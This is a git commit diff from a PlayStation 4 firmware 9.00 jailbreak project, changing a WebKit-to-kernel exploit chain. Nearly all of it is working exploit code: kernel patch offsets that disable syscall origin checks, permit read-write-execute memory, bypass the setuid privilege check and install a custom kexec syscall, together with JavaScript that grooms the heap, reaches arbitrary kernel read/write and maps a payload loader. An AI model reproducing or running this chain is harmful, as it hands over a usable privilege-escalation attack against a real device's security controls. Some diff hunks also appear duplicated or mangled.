Clean-Up & Abc Fix to Avoid KP

ABC fix is to avoid any KP after a succcess on Kernel Exploit w/o any errors. This patch does not improve the success rate.
2025-05-23 01:14:30 -06:00
parent 1b275030ee
commit b57bab46ab
6 changed files with 162 additions and 81 deletions
@@ -18,7 +18,7 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
 <html>
    <head>
        <meta charset='utf-8'>
-        <title>PSFree-Lapse Exploit For 9.00</title>
+        <title>PSFree-Lapse Exploit For PS4 9.00</title>
        <style>
            @font-face {
                font-family: 'logging';
@@ -37,6 +37,6 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
        source code and license.<br>
        <pre id='console'></pre>
    </body>
-    <script src="payload.js"></script>
+    <script src="./payload.js"></script>
    <script type='module' src='./alert.mjs'></script>
 </html>
@@ -15,6 +15,8 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 // 9.00
 #include <stddef.h>
 #include "types.h"
@@ -53,55 +55,129 @@ void restore(struct kexec_args *uap) {
 void do_patch(void) {
    // offset to fast_syscall()
-    const size_t off_fast_syscall = 0x1C0;
+    const size_t off_fast_syscall = 0x1c0;
-    void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
+    void * const kbase = (void *)rdmsr(0xc0000082) - off_fast_syscall;
    disable_cr0_wp();
-    //ChendoChap Patches For 900
+
-    const size_t KERNEL_enable_syscalls_1 = 0x490;
+    // patch amd64_syscall() to allow calling syscalls everywhere
-    const size_t KERNEL_enable_syscalls_2 = 0x4B5;
+
-    const size_t KERNEL_enable_syscalls_3 = 0x4B9;
+    // struct syscall_args sa; // initialized already
-    const size_t KERNEL_enable_syscalls_4 = 0x4C2;
+    // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
-    const size_t KERNEL_mprotect = 0x80B8D;
+    // int is_invalid_syscall = 0
-    const size_t KERNEL_prx = 0x23AEC4;
+    //
-    const size_t KERNEL_mmap_1 = 0x16632A;
+    // // check the calling code if it looks like one of the syscall stubs at a
-    const size_t KERNEL_mmap_2 = 0x16632D;
+    // // libkernel library and check if the syscall number correponds to the
-    const size_t KERNEL_dlsym_1 = 0x23B67F;
+    // // proper stub
-    const size_t KERNEL_dlsym_2 = 0x221b40;
+    // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
-    const size_t KERNEL_setuid = 0x1A06;
+    //     || sa.code != (u32)(code >> 0x10)
-    const size_t KERNEL_bzero = 0x2713FD;
+    // ) {
-    const size_t KERNEL_pagezero = 0x271441;
+    //     // patch this to " = 0" instead
-    const size_t KERNEL_memcpy = 0x2714BD;
+    //     is_invalid_syscall = -1;
-    const size_t KERNEL_pagecopy = 0x271501;
+    // }
-    const size_t KERNEL_copyin = 0x2716AD;
+    write32(kbase, 0x490, 0);
-    const size_t KERNEL_copyinstr = 0x271B5D;
+    // these code corresponds to the check that ensures that the caller's
-    const size_t KERNEL_copystr = 0x271C2D;
+    // instruction pointer is inside the libkernel library's memory range
-    const size_t KERNEL_veriPatch = 0x626874;
+    //
-    const size_t KERNEL_setcr0_patch = 0x3ade3B;
+    // // patch the check to always go to the "goto do_syscall;" line
-    write32(kbase, KERNEL_enable_syscalls_1, 0);
+    // void *code = td->td_frame->tf_rip;
-    write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
+    // if (libkernel->start <= code && code < libkernel->end
-    write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
+    //     && is_invalid_syscall == 0
-    write8(kbase, KERNEL_enable_syscalls_4, 0xEB);  
+    // ) {
-    write8(kbase, KERNEL_mmap_1, 0x37);
+    //     goto do_syscall;
-    write8(kbase, KERNEL_mmap_2, 0x37);
+    // }
-    write32(kbase, KERNEL_mprotect, 0);      
+    //
-    write8(kbase, KERNEL_dlsym_1, 0xEB);
+    // do_syscall:
-    write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
+    //     ...
-    write8(kbase, KERNEL_setuid, 0xEB);
+    //     lea     rsi, [rbp - 0x78]
-    write16(kbase, KERNEL_prx, 0xE990);
+    //     mov     rdi, rbx
-    write8(kbase, KERNEL_bzero, 0xEB);
+    //     mov     rax, qword [rbp - 0x80]
-    write8(kbase, KERNEL_pagezero, 0xEB);
+    //     call    qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
-    write8(kbase, KERNEL_memcpy, 0xEB);
+    //
-    write8(kbase, KERNEL_pagecopy, 0xEB);
+    // sy_call() is the function that will execute the requested syscall.
-    write8(kbase, KERNEL_copyin, 0xEB);
+    write16(kbase, 0x4b5, 0x9090);
-    write8(kbase, KERNEL_copyinstr, 0xEB);
+    write16(kbase, 0x4b9, 0x9090);
-    write8(kbase, KERNEL_copystr, 0xEB);
+    write8(kbase, 0x4c2, 0xeb);
-    write16(kbase, KERNEL_veriPatch, 0x9090);
+
-    write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);        
+    // patch sys_mmap() to allow rwx mappings
    // patch maximum cpu mem protection: 0x33 -> 0x37
    // the ps4 added custom protections for their gpu memory accesses
    // GPU X: 0x8 R: 0x10 W: 0x20
    // that's why you see other bits set
    // ref: https://cturt.github.io/ps4-2.html
    write8(kbase, 0x16632a, 0x37);
    write8(kbase, 0x16632d, 0x37);
    // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
    //
    // this check is skipped after the patch
    //
    // if ((new_prot & current->max_protection) != new_prot) {
    //     vm_map_unlock(map);
    //     return (KERN_PROTECTION_FAILURE);
    // }
    write32(kbase, 0x80b8d, 0);
    // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
    // call    ...
    // mov     r14, qword [rbp - 0xad0]
    // cmp     eax, 0x4000000
    // jb      ... ; patch jb to jmp
    write8(kbase, 0x23b67f, 0xeb);
    // patch called function to always return 0
    //
    // sys_dynlib_dlsym:
    //     ...
    //     mov     edi, 0x10 ; 16
    //     call    patched_function ; kernel_base + 0x951c0
    //     test    eax, eax
    //     je      ...
    //     mov     rax, qword [rbp - 0xad8]
    //     ...
    // patched_function: ; patch to "xor eax, eax; ret"
    //     push    rbp
    //     mov     rbp, rsp
    //     ...
    write32(kbase, 0x221b40, 0xc3c03148);
    // patch sys_setuid() to allow freely changing the effective user ID
    // ; PRIV_CRED_SETUID = 50
    // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
    // test eax, eax
    // je ... ; patch je to jmp
    write8(kbase, 0x1a06, 0xeb);
    // overwrite the entry of syscall 11 (unimplemented) in sysent
    //
    // struct args {
    //     u64 rdi;
    //     u64 rsi;
    //     u64 rdx;
    //     u64 rcx;
    //     u64 r8;
    //     u64 r9;
    // };
    //
    // int sys_kexec(struct thread td, struct args *uap) {
    //     asm("jmp qword ptr [rsi]");
    // }
    // sysent[11]
    const size_t offset_sysent_11 = 0x1100520;
-    write32(kbase, offset_sysent_11, 2);
+    // .sy_narg = 6
    write32(kbase, offset_sysent_11, 6);
    // .sy_call = gadgets['jmp qword ptr [rsi]']
    write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
-    write32(kbase, offset_sysent_11 + 0x2c, 1);  
+    // .sy_thrcnt = SY_THR_STATIC
-   
+    write32(kbase, offset_sysent_11 + 0x2c, 1);
    //veriPatch
    const size_t KERNEL_veriPatch = 0x626874;
    write16(kbase, KERNEL_veriPatch, 0x9090);
    enable_cr0_wp();
-}
+}
@@ -133,7 +133,7 @@ const main_core = 7;
 const num_grooms = 0x200;
 const num_handles = 0x100;
 const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
-const num_alias = 40;
+const num_alias = 10;
 const num_races = 100;
 const leak_len = 16;
 const num_leaks = 5;
@@ -141,6 +141,7 @@ const num_clobbers = 8;
 let chain = null;
 var nogc = [];
 async function init() {
    await rop.init();
    chain = new Chain();
@@ -1458,28 +1459,23 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
    }
    log('achieved arbitrary kernel read/write');
-    // RESTORE: clean corrupt pointers
+    // RESTORE: clean corrupt pointer
-    // pktopts.ip6po_rthdr = NULL
+     // pktopts.ip6po_rthdr = NULL
-    const off_ip6po_rthdr = 0x68;
+     //ABC Patch
-    const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
+     const off_ip6po_rthdr = 0x68;
-    log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
+     const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
-    kmem.write64(r_rthdr_p, 0);
+     const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
-    log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
+     kmem.write64(r_rthdr_p, 0);
     kmem.write64(w_rthdr_p, 0);
     log('corrupt pointers cleaned');
-    const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
+    /*
    log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
    log(kmem.read64(w_rthdr_p));
    log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
    log('corrupt pointers cleaned');
    // REMOVE once restore kernel is ready for production
    // increase the ref counts to prevent deallocation
    kmem.write32(main_sock, kmem.read32(main_sock) + 1);
    kmem.write32(worker_sock, kmem.read32(worker_sock) + 1);
    // +2 since we have to take into account the fget_write()'s reference
-    kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);
+    kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);*/
    return [kbase, kmem, p_ucred, [kpipe, pipe_save, pktinfo_p, w_pktinfo]];
 }
@@ -1601,6 +1597,8 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
    alert("kernel exploit succeeded!");
 }
 // FUNCTIONS FOR STAGE: SETUP
 function setup(block_fd) {
@@ -1640,18 +1638,7 @@ function setup(block_fd) {
    const greqs = make_reqs1(num_reqs);
    // allocate enough so that we start allocating from a newly created slab
    spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
-    cancel_aios(groom_ids_p, num_grooms);
+    cancel_aios(groom_ids_p, num_grooms);        
    {
        // chosen to maximize the number of 0x100 malloc allocs per submission
        const num_reqs = 4;
        const groom_ids = new View4(num_grooms);
        const groom_ids_p = groom_ids.addr;
        const greqs = make_reqs1(num_reqs);
        // allocate enough so that we start allocating from a newly created slab
        spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
        cancel_aios(groom_ids_p, num_grooms);
    }
    return [block_id, groom_ids];
 }
@@ -1671,6 +1658,15 @@ export async function kexploit() {
    await init();
    const _init_t2 = performance.now();
    // If setuid is successful, we dont need to run the kexploit again
    try {
        if (sysi('setuid', 0) == 0) {
            log("Not running kexploit again.")
            return;
        }
    }
    catch (e) {}
    // fun fact:
    // if the first thing you do since boot is run the web browser, WebKit can
    // use all the cores
@@ -1724,6 +1720,7 @@ export async function kexploit() {
        log('\nSTAGE: Patch kernel');
        await patch_kernel(kbase, kmem, p_ucred, restore_info);
    } finally {
        close(unblock_fd);
@@ -1745,8 +1742,7 @@ export async function kexploit() {
    }
 }
-kexploit().then(() => {
+function malloc(sz) {
    function malloc(sz) {
        var backing = new Uint8Array(0x10000 + sz);
        nogc.push(backing);
        var ptr = mem.readp(mem.addrof(backing).add(0x10));
@@ -1761,6 +1757,10 @@ kexploit().then(() => {
        ptr.backing = new Uint32Array(backing.buffer);
        return ptr;
    }
 kexploit().then(() => {
    window.pld_size = new Int(0x26200000, 0x9);
    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
@@ -1781,4 +1781,9 @@ kexploit().then(() => {
        payload_loader,
        payload_buffer,
    );
 })
@@ -34,7 +34,7 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 //     needed offsets on different firmwares (PS5).
 import { Int } from './module/int64.mjs';
-import { Memory } from './module/mem.mjs';
+import { Memory,mem } from './module/mem.mjs';
 import { KB, MB } from './module/offset.mjs';
 import { BufferView } from './module/rw.mjs';